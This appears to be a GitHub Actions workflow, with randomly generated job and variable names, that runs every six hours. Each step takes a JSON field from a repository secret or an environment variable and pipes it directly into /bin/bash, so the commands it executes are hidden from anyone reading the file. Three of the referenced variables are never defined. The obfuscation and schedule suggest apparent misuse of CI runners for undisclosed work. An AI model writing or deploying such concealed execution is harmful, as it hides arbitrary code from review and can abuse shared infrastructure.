name: brokerdisgusting
on:
  workflow_dispatch:
  schedule:
    - cron: '55 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: brokerdisgusting
        env:
          kte854: ${{ secrets.kte854 }}
        run: |
          echo $kte854 | jq -r .wmop79346 | /bin/bash
          echo $v8080 | jq -r .nxmme299 | /bin/bash
          echo $cgzhb7896 | jq -r .uoms35701 | /bin/bash
          echo $ei7026 | jq -r .jrdu4 | /bin/bash

